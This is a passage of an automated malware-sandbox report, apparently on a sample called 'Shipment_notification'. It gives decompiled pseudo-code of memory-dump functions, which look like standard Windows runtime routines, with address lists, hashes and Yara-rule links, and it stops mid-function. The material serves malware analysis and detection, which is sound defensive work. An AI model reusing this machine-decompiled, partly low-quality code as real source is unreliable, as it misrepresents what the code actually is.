                                                                                0x01b43779
                                                                                0x01b43782
                                                                                0x01b43787
                                                                                0x01b43789
                                                                                0x01b43790
                                                                                0x01b43790
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b43792
                                                                                0x01b43795
                                                                                0x00000000
                                                                                0x01b43795
                                                                                0x00000000
                                                                                0x01b43779
                                                                                0x01b43798
                                                                                0x00000000
                                                                                0x01b43798
                                                                                0x00000000
                                                                                0x01b43768
                                                                                0x01b4379b
                                                                                0x01b4379b
                                                                                0x01b43751
                                                                                0x01b43749
                                                                                0x00000000
                                                                                0x01b43740
                                                                                0x01ae91a0
                                                                                0x01ae91a3
                                                                                0x01ae91a9
                                                                                0x01ae91b0
                                                                                0x00000000
                                                                                0x01ae91b0
                                                                                0x01ae9187
                                                                                0x01ae91b4
                                                                                0x01ae91b4
                                                                                0x01ae91bb
                                                                                0x01ae91c0
                                                                                0x01ae91c5
                                                                                0x01ae91c7
                                                                                0x01b437da
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91d2
                                                                                0x01ae91d5
                                                                                0x01ae9239
                                                                                0x01ae9239
                                                                                0x01ae91d7
                                                                                0x01ae91db
                                                                                0x01ae91e1
                                                                                0x01ae91e7
                                                                                0x01ae91fd
                                                                                0x01ae9203
                                                                                0x01ae921e
                                                                                0x01ae9223
                                                                                0x00000000
                                                                                0x01ae9205
                                                                                0x01ae9205
                                                                                0x01ae9208
                                                                                0x01ae920c
                                                                                0x01ae9214
                                                                                0x01ae9214
                                                                                0x01ae920c
                                                                                0x01ae91e9
                                                                                0x01ae91e9
                                                                                0x01ae91ee
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91e7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae9134
                                                                                0x01ae9125
                                                                                0x01ae911d
                                                                                0x01ae914e
                                                                                0x01ae90d1
                                                                                0x01ae90d1
                                                                                0x01ae90d3
                                                                                0x01ae90d6
                                                                                0x01ae90d8
                                                                                0x00000000
                                                                                0x01ae90d8
                                                                                0x01ae90cf

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa6d3e69103537e356a3cf356183482b8e34042acc1e9c2d9390034792f37e01
                                                                                • Instruction ID: e189643fb7af4a0ca93023d2beafc27cb330c00d7563b28398b097f71b8b1532
                                                                                • Opcode Fuzzy Hash: aa6d3e69103537e356a3cf356183482b8e34042acc1e9c2d9390034792f37e01
                                                                                • Instruction Fuzzy Hash: EA01DC726023009FC72E8F08D884B12BFF9EB85338F2540A6E2068B692D770DC81CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B7C450 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E01B7C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01B29910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E01B295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E01B295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E01B295D0();
				return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                0x01b7c458
                                                                                0x01b7c45d
                                                                                0x01b7c466
                                                                                0x01b7c468
                                                                                0x01b7c469
                                                                                0x01b7c46a
                                                                                0x01b7c46b
                                                                                0x01b7c46e
                                                                                0x01b7c46f
                                                                                0x01b7c471
                                                                                0x01b7c476
                                                                                0x01b7c476
                                                                                0x01b7c47c
                                                                                0x01b7c47e
                                                                                0x01b7c480
                                                                                0x01b7c480
                                                                                0x01b7c483
                                                                                0x01b7c484
                                                                                0x01b7c486
                                                                                0x01b7c488
                                                                                0x01b7c48f
                                                                                0x01b7c491
                                                                                0x01b7c493
                                                                                0x01b7c493
                                                                                0x01b7c48f
                                                                                0x01b7c498
                                                                                0x01b7c49e
                                                                                0x01b7c4ad
                                                                                0x01b7c4ad
                                                                                0x01b7c4b2
                                                                                0x01b7c4b4
                                                                                0x01b7c4cd

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                • Instruction ID: 78a89d5bfa15f0170118030f41e11a3790363adc5ae294cda969e33ea927565e
                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                • Instruction Fuzzy Hash: ED019671240616BFEB19AF69CC80E62FF6DFF54794F104569F25842560CB21ACA0C7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB4015 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E01BB4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01B02280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01B02280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1bd86ac);
					E01AEF900(0x1bd86d4, _t28);
					E01AFFFB0(0x1bd86ac, _t28, 0x1bd86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E01AFFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                0x01bb401a
                                                                                0x01bb401e
                                                                                0x01bb4023
                                                                                0x01bb4028
                                                                                0x01bb4029
                                                                                0x01bb402b
                                                                                0x01bb402f
                                                                                0x01bb4043
                                                                                0x01bb4046
                                                                                0x01bb4051
                                                                                0x01bb4057
                                                                                0x01bb405f
                                                                                0x01bb4062
                                                                                0x01bb4067
                                                                                0x01bb406f
                                                                                0x01bb407c
                                                                                0x01bb407c
                                                                                0x01bb408c
                                                                                0x01bb408c
                                                                                0x01bb4097

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 505af358ba2ab81988c55a61737745af7727cccbc27f346b60d047953292d122
                                                                                • Instruction ID: 5636a186cf79d1e1e68564edc9112080857cf0cd2dfeb9fbde525e99ecb3df56
                                                                                • Opcode Fuzzy Hash: 505af358ba2ab81988c55a61737745af7727cccbc27f346b60d047953292d122
                                                                                • Instruction Fuzzy Hash: A201AC722015467FD619AB79CD84E53FBACFF55660B000259F60883A51DB24EC11C6E4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BA14FB Relevance: .0, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E01BA14FB(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1bdd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E01B2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01B07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                                                0x01ba14fb
                                                                                0x01ba14fb
                                                                                0x01ba150a
                                                                                0x01ba1514
                                                                                0x01ba1519
                                                                                0x01ba151b
                                                                                0x01ba1526
                                                                                0x01ba152c
                                                                                0x01ba1534
                                                                                0x01ba1537
                                                                                0x01ba153a
                                                                                0x01ba1545
                                                                                0x01ba1557
                                                                                0x01ba1547
                                                                                0x01ba1550
                                                                                0x01ba1550
                                                                                0x01ba1562
                                                                                0x01ba1563
                                                                                0x01ba1565
                                                                                0x01ba157f

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2567ea55e0c51fcd786740219341068e30a39281a7e0a1025cfe175570253339
                                                                                • Instruction ID: 1b828bb5bb8328aa9d1a5de25b674af82eab755bacf213310172c4261910a52b
                                                                                • Opcode Fuzzy Hash: 2567ea55e0c51fcd786740219341068e30a39281a7e0a1025cfe175570253339
                                                                                • Instruction Fuzzy Hash: 49019671A01258AFCF18DFA8D841EAEBBB8EF45710F404096F944EB280DB70DA04CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BA138A Relevance: .0, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E01BA138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1bdd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E01B2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01B07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                                                0x01ba138a
                                                                                0x01ba138a
                                                                                0x01ba1399
                                                                                0x01ba13a3
                                                                                0x01ba13a8
                                                                                0x01ba13aa
                                                                                0x01ba13b5
                                                                                0x01ba13bb
                                                                                0x01ba13c3
                                                                                0x01ba13c6
                                                                                0x01ba13c9
                                                                                0x01ba13d4
                                                                                0x01ba13e6
                                                                                0x01ba13d6
                                                                                0x01ba13df
                                                                                0x01ba13df
                                                                                0x01ba13f1
                                                                                0x01ba13f2
                                                                                0x01ba13f4
                                                                                0x01ba140e

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc5939dc059589b61d0e821c75fa509d2ca521b35bfff7ebd2b06115d8f5e4e4
                                                                                • Instruction ID: 4d10a5dd6a1af4c523f7525cb16f1520d13f9db097f389e9c9a966e25c418f13
                                                                                • Opcode Fuzzy Hash: dc5939dc059589b61d0e821c75fa509d2ca521b35bfff7ebd2b06115d8f5e4e4
                                                                                • Instruction Fuzzy Hash: 42015671A05219AFDB18DFA9D981EAEBBF8EF45710F404096F904EB280DB749A05C794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE58EC Relevance: .0, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E01AE58EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x1bdd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1ac5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01AE5943() != 0 &&  *0x1bd5320 > 5) {
					E01B67B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01B67B5E( &_v28, _t28);
					_t11 = E01B67B9C(0x1bd5320, 0x1acbf15,  &_v28, _t22, 4,  &_v76);
				}
				return L01B2B640(_t11, _t17, _v8 ^ _t29, 0x1acbf15, _t27, _t28);
			}















                                                                                0x01ae58fb
                                                                                0x01ae58fe
                                                                                0x01ae5906
                                                                                0x01ae590a
                                                                                0x01ae593c
                                                                                0x01ae593c
                                                                                0x01ae590c
                                                                                0x01ae590c
                                                                                0x01ae5911
                                                                                0x00000000
                                                                                0x01ae5913
                                                                                0x01ae5913
                                                                                0x01ae5913
                                                                                0x01ae5911
                                                                                0x01ae591d
                                                                                0x01b41035
                                                                                0x01b4103c
                                                                                0x01b4103f
                                                                                0x01b41056
                                                                                0x01b41056
                                                                                0x01ae593b

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 97278816faae921198ad1eb9f27cf18b9e86f17fe3ecfbf600e087dd180ea3d0
                                                                                • Instruction ID: 508cb0861b8648115d2604e449807fda2f9e007058076931a39cc7c2c31a1b54
                                                                                • Opcode Fuzzy Hash: 97278816faae921198ad1eb9f27cf18b9e86f17fe3ecfbf600e087dd180ea3d0
                                                                                • Instruction Fuzzy Hash: 9901DF35E001099BDB28EF68E854AAE77FCEB56134F4800A9EA05D7344EF20ED018690
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AFB02A Relevance: .0, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AFB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01B07D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01B67016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                0x01afb037
                                                                                0x01afb039
                                                                                0x01afb03b
                                                                                0x01afb040
                                                                                0x01b4a60e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4a61d
                                                                                0x01afb04b
                                                                                0x01afb04e
                                                                                0x01b4a627
                                                                                0x01b4a634
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4a641
                                                                                0x01b4a653
                                                                                0x01b4a643
                                                                                0x01b4a64c
                                                                                0x01b4a64c
                                                                                0x01b4a65b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4a66c
                                                                                0x01afb057
                                                                                0x01afb057
                                                                                0x01afb057
                                                                                0x01afb046
                                                                                0x01afb046
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                • Instruction ID: 91122ced57e7454df9f2a6d66c6d9e3e384aac0dd03eb2b9cea76089a7b483c5
                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                • Instruction Fuzzy Hash: EE015E722445809FE726C76CC944F667BE8EB95650F0940A5BA19CB651D738DC40C621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB1074 Relevance: .0, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E01BB1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L01BB165E(__ebx, 0x1bd8ae4, (__edx -  *0x1bd8b04 >> 0x14) + (__edx -  *0x1bd8b04 >> 0x14), __edi, __ecx, (__edx -  *0x1bd8b04 >> 0x14) + (__edx -  *0x1bd8b04 >> 0x14));
				}
				E01BAAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01B07D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L01B9FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}












                                                                                0x01bb1074
                                                                                0x01bb1080
                                                                                0x01bb1082
                                                                                0x01bb108a
                                                                                0x01bb108f
                                                                                0x01bb1093
                                                                                0x01bb10a8
                                                                                0x01bb10ab
                                                                                0x01bb10ab
                                                                                0x01bb10c3
                                                                                0x01bb10cf
                                                                                0x01bb10e1
                                                                                0x01bb10d1
                                                                                0x01bb10da
                                                                                0x01bb10da
                                                                                0x01bb10e9
                                                                                0x01bb10f5
                                                                                0x01bb10f5
                                                                                0x01bb10fe

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74d2a641c246fc64940c8e68495ac099e6bcf001a340a52e9ee6d0c38879a773
                                                                                • Instruction ID: e48bcb6a2ed1b198bf626c258d3b51c4fe9bc35692508c60f7d3f7bef4cad38f
                                                                                • Opcode Fuzzy Hash: 74d2a641c246fc64940c8e68495ac099e6bcf001a340a52e9ee6d0c38879a773
                                                                                • Instruction Fuzzy Hash: 640128726047429BCB19EB2CD880B6A7BD5EB84310F0486A9F98583690EF71D440CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB8A62 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E01BB8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1bdd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01B07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                                                                                0x01bb8a62
                                                                                0x01bb8a71
                                                                                0x01bb8a79
                                                                                0x01bb8a82
                                                                                0x01bb8a85
                                                                                0x01bb8a89
                                                                                0x01bb8a8c
                                                                                0x01bb8a8f
                                                                                0x01bb8a92
                                                                                0x01bb8a95
                                                                                0x01bb8a9f
                                                                                0x01bb8ab1
                                                                                0x01bb8aa1
                                                                                0x01bb8aaa
                                                                                0x01bb8aaa
                                                                                0x01bb8abc
                                                                                0x01bb8abd
                                                                                0x01bb8abf
                                                                                0x01bb8ada

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eaac33d3dd8d694fc22a1e4038d9b9f4ac775982650fed8112727b1dc6ab2ba3
                                                                                • Instruction ID: 68ea30d60cea30c14cc6bbaca1c4fd46910975e719c5dba649f86650e403f4ce
                                                                                • Opcode Fuzzy Hash: eaac33d3dd8d694fc22a1e4038d9b9f4ac775982650fed8112727b1dc6ab2ba3
                                                                                • Instruction Fuzzy Hash: 69012171A0121D9FCB04DFA9D9819EEBBB8EF59710F10409AF904E7351DB74A901CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEDB60 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AEDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E01AEDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E01AEE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L01AEE8B0(__ecx, _t14, 0xfff);
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                0x01aedb64
                                                                                0x01aedb66
                                                                                0x01aedb6b
                                                                                0x01aedbaa
                                                                                0x01aedb71
                                                                                0x01aedb76
                                                                                0x01aedb7a
                                                                                0x01aedba3
                                                                                0x01aedb7c
                                                                                0x01aedb87
                                                                                0x01aedb8b
                                                                                0x01b44fa1
                                                                                0x01b44fb3
                                                                                0x01b44fb8
                                                                                0x01aedb91
                                                                                0x01aedb96
                                                                                0x01aedb98
                                                                                0x01aedb98
                                                                                0x01aedb8b
                                                                                0x01aedb7a
                                                                                0x01aedb9d
                                                                                0x01aedba2

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                • Instruction ID: f9af7377fc827f103d668c6527b4eb98d21608d460389c5778ebe51d52196aa5
                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                • Instruction Fuzzy Hash: E2F096336416239BDB326BD98988F6BBAE59FD1A60F1A0035F2059B344DE608C0296E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEB1E1 Relevance: .0, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AEB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01B07D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01B07D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01B67016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                0x01aeb1e8
                                                                                0x01aeb1ea
                                                                                0x01aeb1f3
                                                                                0x01b44a17
                                                                                0x01aeb1f9
                                                                                0x01aeb1f9
                                                                                0x01aeb1f9
                                                                                0x01aeb201
                                                                                0x01b44a21
                                                                                0x01b44a2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b44a3b
                                                                                0x01b44a4d
                                                                                0x01b44a3d
                                                                                0x01b44a46
                                                                                0x01b44a46
                                                                                0x01b44a55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01aeb20a
                                                                                0x01aeb20a
                                                                                0x01aeb20a
                                                                                0x01aeb20a

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                • Instruction ID: cb9692234e239f97b3f6122feb89762ec061f6c5c167c78d0b2c3c4c719d75a9
                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                • Instruction Fuzzy Hash: CD01A432200680ABEB2B975DC80CF69BFD9EF51754F0940E1FA148B6B2EB79D810D725
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B7FE87 Relevance: .0, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E01B7FE87(intOrPtr __ecx) {
				signed int _v8;
